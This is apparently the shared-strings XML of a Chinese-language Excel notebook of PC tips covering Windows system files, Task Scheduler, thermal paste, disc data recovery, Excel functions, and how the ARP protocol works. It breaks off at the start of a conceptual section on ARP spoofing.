    <t>office安装文件，可在磁盘清理中删除；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>System volume Information</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ｐagefile.sys</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ｈiberfil.sys</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Vod-cache-data</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>迅雷看看的缓存文件，自动选择空间大的分区；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统还原点文件夹,存在各分区，可使用命令：Rstrui.exe操作；或系统属性---系统保护选项卡---系统还原设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>休眠文件，存放在系统盘，大小等于物理内存，可使用命令：powercfg -h 0n打开休眠；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>分页文件，虚拟内存，可转移到不同分区位置；系统属性---高级选项卡---性能设置---高级选项卡---虚拟内存更改；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ｄriver.cab</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>XP自动备份的驱动:C:\windows\drive cache\i386\driver.cab;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>temp</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统临时文件夹,c:\windows\temp</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ime</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>输入法,c:\windows\ime;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>计划任务程序</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 创建任务:名称\描述;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 触发器:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>a 每天\每周\每月,一次;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>b 计算机启动时,当前用户登录时;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>c 当特定事件被记录时;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 操作:启动程序\发送电子邮件\显示消息;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>计划任务程序</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统操作</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硅脂分为导热硅脂和润滑硅脂两种。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">导热硅脂:俗名又叫散热膏,是以特种硅油做基础油,新型金属氧化物做填料,配以多种功能添加剂,经特定的工艺加工而成的膏状物.颜色因材料不同而具有不同的外观.其具有良好的导热、耐温、绝缘性能，是耐热器件理想的介质材料，而且性能稳定，在使用中不会产生腐蚀气体，不会对所接触的金属产生影响。 </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>◆ 极佳的导热性、电绝缘性和使用稳定性，耐高低温性能好 　　◆ 抗水、不固化，对接触的金属材料无腐蚀（铜、铝、钢） 　　◆ 极低的挥发损失，不干、不熔化,良好的材料适应性和宽的使用温度范围(-50∽+250℃) 　　◆ 无毒、无味、无腐蚀性,化学物理性能稳定</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>　◆ 适用于各种电子、电器设备中发热体与散热设施间的缝隙填充，提高散热效果</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>　润滑硅脂, Lubricating silicon grease ，因主要起润滑作用而的名。</t>
  </si>
  <si>
    <t>润滑硅脂</t>
  </si>
  <si>
    <t>　　产品简介： 产品是用润滑性能和绝缘性能优异的填料（白碳黑）与有机硅产品混合而成的半透明膏状物,在200 ℃甚至以上的高温下对电子,电气的塑胶件,钢件,轴承等传动部分有良好的润滑作用,产品无毒无味,对钢,铁,铜 ,铝无腐蚀作用。</t>
  </si>
  <si>
    <t>　　产品用途： 主要用于电子,电器元件不同间隙滚动,滑动,摩擦部位以及螺旋结构的润滑,以达到减少阻力提高产品的可靠性和使用寿命。</t>
  </si>
  <si>
    <t xml:space="preserve">而增料填充了CPU和散热器之间的微小空隙，保证了导热性，它的适用范围很广，几乎适合任何散热条件的需要。 </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">　硅胶是硅橡胶的一种，其导热性比一般的橡胶稍高，但比硅脂相低很多，而且一旦固化，很难将粘合的物体分开，用在一些只需要一次性粘合的场合，比如显卡，内存的散热片上。 
</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">涂抹硅脂的方法很简单，在这里提供两种方法：一是，在CPU表面中心挤上硅脂，然后给手指戴上胶套，将硅脂涂抹均匀即可；二是，在CPU表面中心挤上一点硅脂，然后压上散热器，按箭头指示方向旋转，确保硅脂均匀扩展和无气泡。
</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硅胶和导热硅脂</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硅胶和导热硅脂</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如何读取损坏光盘中的文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 使用一款损坏数据拷贝工具：Badcopy;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 使用录制的方法，边播放边录制，replay Video capture.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>easyrecovery</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>当出现误删除、误格式化、误操作磁盘分区时，进行数据恢复，但属收费软件，类似功能的免费软件有：Pandora Recovery\FreeFastRecovery\Recuva\DiskGenius;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如何读取损坏光盘中的文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>光盘刻录</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>参数</t>
  </si>
  <si>
    <t>说明</t>
  </si>
  <si>
    <t>Concatenate</t>
  </si>
  <si>
    <t>"text1","text2", …</t>
  </si>
  <si>
    <t>将若干个字符串合并成一个字符串，相当于：＝"text1"&amp;"text2"&amp;…</t>
  </si>
  <si>
    <t>Mid</t>
  </si>
  <si>
    <t>"text",start-num,num-chars</t>
  </si>
  <si>
    <t>从一个字符串中指定位置开始返回指定长度的若干字符串；</t>
  </si>
  <si>
    <t>Replace</t>
  </si>
  <si>
    <t>"old text",start-num,num-chars,"new-text"</t>
  </si>
  <si>
    <t>用一个字符串来取代另一个字符串中指定长度的部分字符串</t>
  </si>
  <si>
    <t>Lower</t>
  </si>
  <si>
    <t>"text"</t>
  </si>
  <si>
    <t>全部转化为小写</t>
  </si>
  <si>
    <t>Upper</t>
  </si>
  <si>
    <t>全部转化为大写</t>
  </si>
  <si>
    <t>Proper</t>
  </si>
  <si>
    <t>将一个字符串中各英文单词的第一个字母转化为大写，其它为小写；</t>
  </si>
  <si>
    <t>Right</t>
  </si>
  <si>
    <t>"text",num-char</t>
  </si>
  <si>
    <t>从一个文本字符最后一个字符开始返回指定个数的字符；</t>
  </si>
  <si>
    <t>Left</t>
  </si>
  <si>
    <t>从一个文本字符最前面的字符开始返回指定个数的字符；</t>
  </si>
  <si>
    <t>Even</t>
  </si>
  <si>
    <t>number</t>
  </si>
  <si>
    <t>将正数（负数）向上（下）舍入到最接近的偶数；</t>
  </si>
  <si>
    <t>Odd</t>
  </si>
  <si>
    <t>将正数（负数）向上（下）舍入到最接近的奇数；</t>
  </si>
  <si>
    <t>Round</t>
  </si>
  <si>
    <t>number,num.digits</t>
  </si>
  <si>
    <t>根据指定倍数将数字四舍五入；</t>
  </si>
  <si>
    <t>Ceiling</t>
  </si>
  <si>
    <t>number,significance</t>
  </si>
  <si>
    <t>向上舍入到接近significance的倍数；</t>
  </si>
  <si>
    <t>Floor</t>
  </si>
  <si>
    <t>向下舍入到接近significance的倍数；</t>
  </si>
  <si>
    <t>Mod</t>
  </si>
  <si>
    <t>number,divisor</t>
  </si>
  <si>
    <t>返回两数相除的余数；</t>
  </si>
  <si>
    <t>Max</t>
  </si>
  <si>
    <t>number1, …</t>
  </si>
  <si>
    <t>返回一组数据中的最大值</t>
  </si>
  <si>
    <t>Min</t>
  </si>
  <si>
    <t>返回一组数据中的最小值；</t>
  </si>
  <si>
    <t>Sum</t>
  </si>
  <si>
    <t>单元格区域求和；</t>
  </si>
  <si>
    <t>Sumif</t>
  </si>
  <si>
    <t>range,criteria,sum-range</t>
  </si>
  <si>
    <t>对满足条件的单元格求和；</t>
  </si>
  <si>
    <t>Now</t>
  </si>
  <si>
    <t>返回当前时间值</t>
  </si>
  <si>
    <t>Abs</t>
  </si>
  <si>
    <t>给出绝对值；</t>
  </si>
  <si>
    <t>Sign</t>
  </si>
  <si>
    <t>正数返回1,负数返回-1,0返回为0；</t>
  </si>
  <si>
    <t>Excel函数</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Excel函数</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1 ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>协议工作原理简介</t>
    </r>
  </si>
  <si>
    <r>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Address Resolution Protocal</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（地址转换协议）的简称，是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TCP/IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>协议中最底层的协议之一。它的作用是完成</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（物理地址）的转换。在局域网中两台计算机之间的通讯，或者局域网中的计算机将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据报转发给网关的时候，网卡都需要知道目标计算机的物理地址，以填充物理帧中的目的地址。</t>
    </r>
  </si>
  <si>
    <r>
      <t>现在假设同一以太网中的计算机</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>192.168.0.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）需要向计算机</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>192.168.0.2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）发送数据报，而此时</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>尚不知道</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的物理地址。为了获得</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的物理地址，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在局域网上发送</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>广播，查询</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>192.168.0.2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这个物理地址，同时在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>包中填入自己的物理地址</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Ma</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，相当于发出这样的询问“谁拿了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>192.168.0.2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这个地址？请回我（我就是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Ma</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这个物理地址）。”计算机</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在收到了这个查询以后，以</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Ma</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为目的地址发回一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>包，里面包含了自己的物理地址。这样通讯的双方都了解了对方的物理地址，通讯过程正式建立。在实际的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>协议软件的实现中还有一些应该注意的事项：每台计算机上都有一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缓冲，它保存了一定数量的从</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址的映射，同时当一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>广播到来时，虽然这个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>广播可能与它无关，但</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>协议软件也会把其中的物理地址与</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址的映射记录下来，这样做的好处是能够减少</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报在局域网上发送的次数。同时，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缓冲中</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址与物理地址之间的映射并不是一但生成就永久有效，每一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>映射表项都有自己的时延，如果过了一定的时间还没有新的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>到来，那么这个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>映射就从缓冲中被删除了。那么下一次计算机向这个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址发送数据包的时候必须来一次新的查询。</t>
    </r>
  </si>
  <si>
    <r>
      <t>通常</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>协议都在支持广播的网络上使用，比方以太网，这种数据包不能跨物理网段使用，即不能跨越一个路由器（除路由器本身还用作</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>代理以外）。</t>
    </r>
  </si>
  <si>
    <r>
      <t>2 Arp</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>欺骗的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>种方式</t>
    </r>
  </si>
  <si>
    <r>
      <t>我们知道系统向一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ip</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址发送数据的时候总是先通过子网掩码来计算是否在同一网内，如果在，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>arp</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查询这个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ip</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址，向这个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址发送数据</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>;</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>如果计算后，发现不再同一个网内，那就</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>询问网关的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址，发送数据直接丢给网关处理，问题就出在这了，我们上网，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ip</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>99.9%</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的不再同一个网内，必定通过网关。例如：主机</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
